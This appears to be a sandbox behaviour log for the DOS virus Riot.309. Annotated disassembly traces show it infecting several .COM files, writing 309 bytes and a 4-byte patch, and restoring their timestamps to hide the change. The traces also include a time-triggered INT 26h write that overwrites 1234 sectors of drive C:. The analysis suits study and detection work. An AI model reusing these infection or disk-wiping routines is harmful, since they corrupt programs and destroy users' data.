Sample viewer

vx.netlux.org/Virus.DOS.Riot.309


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:47:25.834423769Z 26 PC: 12a85 | Set disk transfer address
2018-12-17T22:47:25.835943945Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:25.846213378Z 61 PC: 12acb | Open file (Filename = 'c:\dos\doskey.com')
2018-12-17T22:47:25.853371817Z 78 PC: 12a94 | Find first file
2018-12-17T22:47:25.859994129Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:25.876610577Z 61 PC: 12acb | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:47:25.883655903Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:25.885650951Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:25.893829135Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:25.895660987Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
; Instruction window logged after INT 21h AH=2Ch (Get time): the tail of the per-file modification routine.
0x12afc: je 0x12af6                        ; loop back while the preceding `add dl, dh` (hundredths + seconds) gave zero
0x12afe: mov word ptr [bp + 0x10e], bx     ; store BX at [bp+0x10e]; the value's role is not visible in this window
0x12b02: call 0x22a50                      ; NOTE(review): a 16-bit near call wraps at 64 KiB, so the target is likely 0x12a50; the 309-byte write logged at PC 12a5e fits that
0x12b05: mov ax, 0x4200                    ; AH=42h, AL=00h: move file pointer, origin = start of file
0x12b08: sub cx, cx                        ; CX = 0 (high word of the offset)
0x12b0a: cdq                               ; one-byte opcode, i.e. CWD in 16-bit code: AX=4200h is non-negative, so DX = 0
0x12b0b: int 0x21                          ; seek to offset CX:DX = 0
0x12b0d: mov ah, 0x40                      ; AH=40h: write to file or device
0x12b0f: mov cx, 4                         ; byte count = 4
0x12b12: lea dx, word ptr [bp + 0x22d]     ; DX = source buffer at bp+0x22d (contents not shown)
0x12b16: int 0x21                          ; overwrites the first 4 bytes of the file (trace: "Write 4 bytes on handle 5")
0x12b18: pop dx                            ; pushed outside this window; used as the date (DX) ...
0x12b19: pop cx                            ; ... and time (CX) below; presumably the values returned by the function 57h call logged at PC 12ad3
0x12b1a: mov ax, 0x5701                    ; AH=57h, AL=01h: set file date and time
0x12b1d: int 0x21                          ; if these are the original values, the timestamp looks untouched; compare size or hash, not mtime
0x12b1f: mov ah, 0x3e                      ; AH=3Eh: close file handle
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx                            ; past the ret; belongs to whatever code follows
2018-12-17T22:47:25.898272874Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:25.907666443Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:25.910606977Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:25.918252811Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:25.920637682Z 62 PC: 12b23 | Close file
2018-12-17T22:47:25.930109367Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:25.933521296Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:25.944330134Z 61 PC: 12acb | Open file (Filename = 'PRINT.COM')
2018-12-17T22:47:25.95229598Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:25.953833318Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:25.960908189Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:25.963009066Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
; Instruction window logged after INT 21h AH=2Ch (Get time): the tail of the per-file modification routine.
0x12afc: je 0x12af6                        ; loop back while the preceding `add dl, dh` (hundredths + seconds) gave zero
0x12afe: mov word ptr [bp + 0x10e], bx     ; store BX at [bp+0x10e]; the value's role is not visible in this window
0x12b02: call 0x22a50                      ; NOTE(review): a 16-bit near call wraps at 64 KiB, so the target is likely 0x12a50; the 309-byte write logged at PC 12a5e fits that
0x12b05: mov ax, 0x4200                    ; AH=42h, AL=00h: move file pointer, origin = start of file
0x12b08: sub cx, cx                        ; CX = 0 (high word of the offset)
0x12b0a: cdq                               ; one-byte opcode, i.e. CWD in 16-bit code: AX=4200h is non-negative, so DX = 0
0x12b0b: int 0x21                          ; seek to offset CX:DX = 0
0x12b0d: mov ah, 0x40                      ; AH=40h: write to file or device
0x12b0f: mov cx, 4                         ; byte count = 4
0x12b12: lea dx, word ptr [bp + 0x22d]     ; DX = source buffer at bp+0x22d (contents not shown)
0x12b16: int 0x21                          ; overwrites the first 4 bytes of the file (trace: "Write 4 bytes on handle 5")
0x12b18: pop dx                            ; pushed outside this window; used as the date (DX) ...
0x12b19: pop cx                            ; ... and time (CX) below; presumably the values returned by the function 57h call logged at PC 12ad3
0x12b1a: mov ax, 0x5701                    ; AH=57h, AL=01h: set file date and time
0x12b1d: int 0x21                          ; if these are the original values, the timestamp looks untouched; compare size or hash, not mtime
0x12b1f: mov ah, 0x3e                      ; AH=3Eh: close file handle
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx                            ; past the ret; belongs to whatever code follows
2018-12-17T22:47:25.965950463Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:25.969568801Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:25.972418525Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:25.975123877Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:25.976768316Z 62 PC: 12b23 | Close file
2018-12-17T22:47:25.983821197Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:25.986469613Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:25.996962476Z 61 PC: 12acb | Open file (Filename = 'HELLO.COM')
2018-12-17T22:47:26.005463557Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:26.007640607Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:26.0148487Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:26.016732779Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
; Instruction window logged after INT 21h AH=2Ch (Get time): the tail of the per-file modification routine.
0x12afc: je 0x12af6                        ; loop back while the preceding `add dl, dh` (hundredths + seconds) gave zero
0x12afe: mov word ptr [bp + 0x10e], bx     ; store BX at [bp+0x10e]; the value's role is not visible in this window
0x12b02: call 0x22a50                      ; NOTE(review): a 16-bit near call wraps at 64 KiB, so the target is likely 0x12a50; the 309-byte write logged at PC 12a5e fits that
0x12b05: mov ax, 0x4200                    ; AH=42h, AL=00h: move file pointer, origin = start of file
0x12b08: sub cx, cx                        ; CX = 0 (high word of the offset)
0x12b0a: cdq                               ; one-byte opcode, i.e. CWD in 16-bit code: AX=4200h is non-negative, so DX = 0
0x12b0b: int 0x21                          ; seek to offset CX:DX = 0
0x12b0d: mov ah, 0x40                      ; AH=40h: write to file or device
0x12b0f: mov cx, 4                         ; byte count = 4
0x12b12: lea dx, word ptr [bp + 0x22d]     ; DX = source buffer at bp+0x22d (contents not shown)
0x12b16: int 0x21                          ; overwrites the first 4 bytes of the file (trace: "Write 4 bytes on handle 5")
0x12b18: pop dx                            ; pushed outside this window; used as the date (DX) ...
0x12b19: pop cx                            ; ... and time (CX) below; presumably the values returned by the function 57h call logged at PC 12ad3
0x12b1a: mov ax, 0x5701                    ; AH=57h, AL=01h: set file date and time
0x12b1d: int 0x21                          ; if these are the original values, the timestamp looks untouched; compare size or hash, not mtime
0x12b1f: mov ah, 0x3e                      ; AH=3Eh: close file handle
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx                            ; past the ret; belongs to whatever code follows
2018-12-17T22:47:26.020569026Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:26.024006735Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:26.02586701Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:26.029896019Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:26.031394214Z 62 PC: 12b23 | Close file
2018-12-17T22:47:26.037905116Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:26.040996153Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:26.049342263Z 61 PC: 12acb | Open file (Filename = 'PHANG.COM')
2018-12-17T22:47:26.054906307Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:26.057469443Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:26.064832525Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:26.066942089Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
; Instruction window logged after INT 21h AH=2Ch (Get time): the tail of the per-file modification routine.
0x12afc: je 0x12af6                        ; loop back while the preceding `add dl, dh` (hundredths + seconds) gave zero
0x12afe: mov word ptr [bp + 0x10e], bx     ; store BX at [bp+0x10e]; the value's role is not visible in this window
0x12b02: call 0x22a50                      ; NOTE(review): a 16-bit near call wraps at 64 KiB, so the target is likely 0x12a50; the 309-byte write logged at PC 12a5e fits that
0x12b05: mov ax, 0x4200                    ; AH=42h, AL=00h: move file pointer, origin = start of file
0x12b08: sub cx, cx                        ; CX = 0 (high word of the offset)
0x12b0a: cdq                               ; one-byte opcode, i.e. CWD in 16-bit code: AX=4200h is non-negative, so DX = 0
0x12b0b: int 0x21                          ; seek to offset CX:DX = 0
0x12b0d: mov ah, 0x40                      ; AH=40h: write to file or device
0x12b0f: mov cx, 4                         ; byte count = 4
0x12b12: lea dx, word ptr [bp + 0x22d]     ; DX = source buffer at bp+0x22d (contents not shown)
0x12b16: int 0x21                          ; overwrites the first 4 bytes of the file (trace: "Write 4 bytes on handle 5")
0x12b18: pop dx                            ; pushed outside this window; used as the date (DX) ...
0x12b19: pop cx                            ; ... and time (CX) below; presumably the values returned by the function 57h call logged at PC 12ad3
0x12b1a: mov ax, 0x5701                    ; AH=57h, AL=01h: set file date and time
0x12b1d: int 0x21                          ; if these are the original values, the timestamp looks untouched; compare size or hash, not mtime
0x12b1f: mov ah, 0x3e                      ; AH=3Eh: close file handle
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx                            ; past the ret; belongs to whatever code follows
2018-12-17T22:47:26.070180783Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:26.074509386Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:26.076516086Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:26.081595319Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:26.084825817Z 62 PC: 12b23 | Close file
2018-12-17T22:47:26.093392713Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:26.096766742Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:26.108259794Z 61 PC: 12acb | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:47:26.116677258Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:26.11850402Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:26.126545057Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:26.128831222Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
; Instruction window logged after INT 21h AH=2Ch (Get time): the tail of the per-file modification routine.
0x12afc: je 0x12af6                        ; loop back while the preceding `add dl, dh` (hundredths + seconds) gave zero
0x12afe: mov word ptr [bp + 0x10e], bx     ; store BX at [bp+0x10e]; the value's role is not visible in this window
0x12b02: call 0x22a50                      ; NOTE(review): a 16-bit near call wraps at 64 KiB, so the target is likely 0x12a50; the 309-byte write logged at PC 12a5e fits that
0x12b05: mov ax, 0x4200                    ; AH=42h, AL=00h: move file pointer, origin = start of file
0x12b08: sub cx, cx                        ; CX = 0 (high word of the offset)
0x12b0a: cdq                               ; one-byte opcode, i.e. CWD in 16-bit code: AX=4200h is non-negative, so DX = 0
0x12b0b: int 0x21                          ; seek to offset CX:DX = 0
0x12b0d: mov ah, 0x40                      ; AH=40h: write to file or device
0x12b0f: mov cx, 4                         ; byte count = 4
0x12b12: lea dx, word ptr [bp + 0x22d]     ; DX = source buffer at bp+0x22d (contents not shown)
0x12b16: int 0x21                          ; overwrites the first 4 bytes of the file (trace: "Write 4 bytes on handle 5")
0x12b18: pop dx                            ; pushed outside this window; used as the date (DX) ...
0x12b19: pop cx                            ; ... and time (CX) below; presumably the values returned by the function 57h call logged at PC 12ad3
0x12b1a: mov ax, 0x5701                    ; AH=57h, AL=01h: set file date and time
0x12b1d: int 0x21                          ; if these are the original values, the timestamp looks untouched; compare size or hash, not mtime
0x12b1f: mov ah, 0x3e                      ; AH=3Eh: close file handle
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx                            ; past the ret; belongs to whatever code follows
2018-12-17T22:47:26.131640129Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:26.140749393Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:26.143283344Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:26.146489437Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:26.14816768Z 62 PC: 12b23 | Close file
2018-12-17T22:47:26.156276625Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:26.160656233Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:26.171502179Z 61 PC: 12acb | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:47:26.180310989Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:26.182255763Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:26.189018387Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:26.191423135Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
; Instruction window logged after INT 21h AH=2Ch (Get time): the tail of the per-file modification routine.
0x12afc: je 0x12af6                        ; loop back while the preceding `add dl, dh` (hundredths + seconds) gave zero
0x12afe: mov word ptr [bp + 0x10e], bx     ; store BX at [bp+0x10e]; the value's role is not visible in this window
0x12b02: call 0x22a50                      ; NOTE(review): a 16-bit near call wraps at 64 KiB, so the target is likely 0x12a50; the 309-byte write logged at PC 12a5e fits that
0x12b05: mov ax, 0x4200                    ; AH=42h, AL=00h: move file pointer, origin = start of file
0x12b08: sub cx, cx                        ; CX = 0 (high word of the offset)
0x12b0a: cdq                               ; one-byte opcode, i.e. CWD in 16-bit code: AX=4200h is non-negative, so DX = 0
0x12b0b: int 0x21                          ; seek to offset CX:DX = 0
0x12b0d: mov ah, 0x40                      ; AH=40h: write to file or device
0x12b0f: mov cx, 4                         ; byte count = 4
0x12b12: lea dx, word ptr [bp + 0x22d]     ; DX = source buffer at bp+0x22d (contents not shown)
0x12b16: int 0x21                          ; overwrites the first 4 bytes of the file (trace: "Write 4 bytes on handle 5")
0x12b18: pop dx                            ; pushed outside this window; used as the date (DX) ...
0x12b19: pop cx                            ; ... and time (CX) below; presumably the values returned by the function 57h call logged at PC 12ad3
0x12b1a: mov ax, 0x5701                    ; AH=57h, AL=01h: set file date and time
0x12b1d: int 0x21                          ; if these are the original values, the timestamp looks untouched; compare size or hash, not mtime
0x12b1f: mov ah, 0x3e                      ; AH=3Eh: close file handle
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx                            ; past the ret; belongs to whatever code follows
2018-12-17T22:47:26.194270916Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:26.203004945Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:26.205500183Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:26.21298266Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:26.214871759Z 62 PC: 12b23 | Close file
2018-12-17T22:47:26.223696479Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:26.227165326Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:26.237569522Z 61 PC: 12acb | Open file (Filename = 'PAH.COM')
2018-12-17T22:47:26.245170262Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:26.247201008Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:26.254019277Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:26.255597572Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
; Instruction window logged after INT 21h AH=2Ch (Get time): the tail of the per-file modification routine.
0x12afc: je 0x12af6                        ; loop back while the preceding `add dl, dh` (hundredths + seconds) gave zero
0x12afe: mov word ptr [bp + 0x10e], bx     ; store BX at [bp+0x10e]; the value's role is not visible in this window
0x12b02: call 0x22a50                      ; NOTE(review): a 16-bit near call wraps at 64 KiB, so the target is likely 0x12a50; the 309-byte write logged at PC 12a5e fits that
0x12b05: mov ax, 0x4200                    ; AH=42h, AL=00h: move file pointer, origin = start of file
0x12b08: sub cx, cx                        ; CX = 0 (high word of the offset)
0x12b0a: cdq                               ; one-byte opcode, i.e. CWD in 16-bit code: AX=4200h is non-negative, so DX = 0
0x12b0b: int 0x21                          ; seek to offset CX:DX = 0
0x12b0d: mov ah, 0x40                      ; AH=40h: write to file or device
0x12b0f: mov cx, 4                         ; byte count = 4
0x12b12: lea dx, word ptr [bp + 0x22d]     ; DX = source buffer at bp+0x22d (contents not shown)
0x12b16: int 0x21                          ; overwrites the first 4 bytes of the file (trace: "Write 4 bytes on handle 5")
0x12b18: pop dx                            ; pushed outside this window; used as the date (DX) ...
0x12b19: pop cx                            ; ... and time (CX) below; presumably the values returned by the function 57h call logged at PC 12ad3
0x12b1a: mov ax, 0x5701                    ; AH=57h, AL=01h: set file date and time
0x12b1d: int 0x21                          ; if these are the original values, the timestamp looks untouched; compare size or hash, not mtime
0x12b1f: mov ah, 0x3e                      ; AH=3Eh: close file handle
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx                            ; past the ret; belongs to whatever code follows
2018-12-17T22:47:26.259721029Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:26.263034985Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:26.264861256Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:26.269029818Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:26.270985232Z 62 PC: 12b23 | Close file
2018-12-17T22:47:26.2788835Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:26.282760584Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:47:26.293437884Z 61 PC: 12acb | Open file (Filename = 'TEST.COM')
2018-12-17T22:47:26.300500403Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:47:26.303015307Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:47:26.306194871Z 66 PC: 12aef | Move file pointer
2018-12-17T22:47:26.308150896Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
; Instruction window logged after INT 21h AH=2Ch (Get time): the tail of the per-file modification routine.
0x12afc: je 0x12af6                        ; loop back while the preceding `add dl, dh` (hundredths + seconds) gave zero
0x12afe: mov word ptr [bp + 0x10e], bx     ; store BX at [bp+0x10e]; the value's role is not visible in this window
0x12b02: call 0x22a50                      ; NOTE(review): a 16-bit near call wraps at 64 KiB, so the target is likely 0x12a50; the 309-byte write logged at PC 12a5e fits that
0x12b05: mov ax, 0x4200                    ; AH=42h, AL=00h: move file pointer, origin = start of file
0x12b08: sub cx, cx                        ; CX = 0 (high word of the offset)
0x12b0a: cdq                               ; one-byte opcode, i.e. CWD in 16-bit code: AX=4200h is non-negative, so DX = 0
0x12b0b: int 0x21                          ; seek to offset CX:DX = 0
0x12b0d: mov ah, 0x40                      ; AH=40h: write to file or device
0x12b0f: mov cx, 4                         ; byte count = 4
0x12b12: lea dx, word ptr [bp + 0x22d]     ; DX = source buffer at bp+0x22d (contents not shown)
0x12b16: int 0x21                          ; overwrites the first 4 bytes of the file (trace: "Write 4 bytes on handle 5")
0x12b18: pop dx                            ; pushed outside this window; used as the date (DX) ...
0x12b19: pop cx                            ; ... and time (CX) below; presumably the values returned by the function 57h call logged at PC 12ad3
0x12b1a: mov ax, 0x5701                    ; AH=57h, AL=01h: set file date and time
0x12b1d: int 0x21                          ; if these are the original values, the timestamp looks untouched; compare size or hash, not mtime
0x12b1f: mov ah, 0x3e                      ; AH=3Eh: close file handle
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx                            ; past the ret; belongs to whatever code follows
2018-12-17T22:47:26.310982336Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-17T22:47:26.321423491Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:47:26.323324012Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:47:26.33058271Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:47:26.334217278Z 62 PC: 12b23 | Close file
2018-12-17T22:47:26.342794422Z 79 PC: 12a94 | Find next file
2018-12-17T22:47:26.345751568Z 44 PC: 12aa1 | Get time 0x12aa1: cmp dl, 2
; Instruction window logged after the Get time call that follows the last Find next file: a time-gated disk write, then hand-back to offset 0100h.
0x12aa4: ja 0x12aaf                        ; skip the disk write unless the preceding `cmp dl, 2` found hundredths-of-a-second <= 2
0x12aa6: mov al, 2                         ; INT 26h drive number: 2 = C:
0x12aa8: mov cx, 0x4d2                     ; sector count = 0x4d2 (1234)
0x12aab: cdq                               ; one-byte opcode, i.e. CWD in 16-bit code; DX (first sector) = 0 when AX is non-negative, presumably AH still holds 2Ch
0x12aac: int 0x26                          ; DOS absolute disk write from DS:BX, destructive. NOTE(review): the log appears to list only INT 21h services, so a missing entry does not show this was skipped
0x12aae: popf                              ; INT 26h returns with the caller's flags still on the stack; discard them
0x12aaf: mov dx, 0x80                      ; DS:0080h, the default DTA location in the PSP
0x12ab2: mov ah, 0x1a                      ; AH=1Ah: set disk transfer address
0x12ab4: int 0x21                          ; (trace: "Set disk transfer address" at PC 12ab6)
0x12ab6: mov di, 0x100                     ; 0100h = entry offset of a .COM program
0x12ab9: push di
0x12aba: ret                               ; push/ret acts as a near jump to 0100h, presumably resuming the host program
0x12abb: lea dx, word ptr [bp + 0x253]     ; separate path, entered from outside this window: DX = file name at bp+0x253
0x12abf: mov ax, 0x4301                    ; AH=43h, AL=01h: set file attributes
0x12ac2: xor cx, cx                        ; CX = 0: clears every attribute, read-only included
0x12ac4: int 0x21
0x12ac6: mov ax, 0x3d02                    ; AH=3Dh, AL=02h: open file for read/write
0x12ac9: int 0x21
0x12acb: jb 0x12b23                        ; CF set = open failed: branch to 0x12b23
2018-12-17T22:47:26.349314221Z 26 PC: 12ab6 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":9223,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:42.522292339Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:22:42.524088059Z 67 PC: 12ac6 | Get or set file attributes
2018-12-25T12:22:42.533396155Z 61 PC: 12acb | Open file (Filename = 'c:\dos\doskey.com')
2018-12-25T12:22:42.541103496Z 78 PC: 12a94 | Find first file
2018-12-25T12:22:42.547605201Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.563123086Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.569622717Z 87 PC: 12ad3 | Get or set file date and time
2018-12-25T12:22:42.570972505Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:42.577669571Z 66 PC: 12aef | Move file pointer
2018-12-25T12:22:42.578990901Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
; Instruction window logged after INT 21h AH=2Ch (Get time): the tail of the per-file modification routine.
0x12afc: je 0x12af6                        ; loop back while the preceding `add dl, dh` (hundredths + seconds) gave zero
0x12afe: mov word ptr [bp + 0x10e], bx     ; store BX at [bp+0x10e]; the value's role is not visible in this window
0x12b02: call 0x22a50                      ; NOTE(review): a 16-bit near call wraps at 64 KiB, so the target is likely 0x12a50; the 309-byte write logged at PC 12a5e fits that
0x12b05: mov ax, 0x4200                    ; AH=42h, AL=00h: move file pointer, origin = start of file
0x12b08: sub cx, cx                        ; CX = 0 (high word of the offset)
0x12b0a: cdq                               ; one-byte opcode, i.e. CWD in 16-bit code: AX=4200h is non-negative, so DX = 0
0x12b0b: int 0x21                          ; seek to offset CX:DX = 0
0x12b0d: mov ah, 0x40                      ; AH=40h: write to file or device
0x12b0f: mov cx, 4                         ; byte count = 4
0x12b12: lea dx, word ptr [bp + 0x22d]     ; DX = source buffer at bp+0x22d (contents not shown)
0x12b16: int 0x21                          ; overwrites the first 4 bytes of the file (trace: "Write 4 bytes on handle 5")
0x12b18: pop dx                            ; pushed outside this window; used as the date (DX) ...
0x12b19: pop cx                            ; ... and time (CX) below; presumably the values returned by the function 57h call logged at PC 12ad3
0x12b1a: mov ax, 0x5701                    ; AH=57h, AL=01h: set file date and time
0x12b1d: int 0x21                          ; if these are the original values, the timestamp looks untouched; compare size or hash, not mtime
0x12b1f: mov ah, 0x3e                      ; AH=3Eh: close file handle
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx                            ; past the ret; belongs to whatever code follows
2018-12-25T12:22:42.581129365Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-25T12:22:42.589774597Z 66 PC: 12b0d | Move file pointer
2018-12-25T12:22:42.591112325Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:42.597655055Z 87 PC: 12b1f | Get or set file date and time
2018-12-25T12:22:42.612653985Z 62 PC: 12b23 | Close file
2018-12-25T12:22:42.654856147Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:42.657447405Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.671603289Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.677857804Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:42.67908875Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:42.686087222Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:42.687653122Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:42.689809246Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:42.692773214Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:42.694385515Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:42.697086005Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:42.698856882Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:42.736331362Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:42.73881652Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.758055452Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.766338421Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:42.7681208Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:42.776614498Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:42.779266516Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:42.781625984Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:42.784389257Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:42.786388465Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:42.789109133Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:42.790636447Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:42.84273957Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:42.845754105Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.912571824Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.922196854Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:42.925016226Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:42.93137746Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:42.932925872Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:42.935649026Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:42.938323066Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:42.940254641Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:42.94446347Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:42.946586759Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:42.98320773Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:42.986778192Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.02827631Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.035100649Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.037878347Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.045277358Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.047050725Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.050369944Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.055128158Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.056540176Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.060011233Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.061859994Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.097386454Z 79 PC: 12a94 | Find next file (See above)
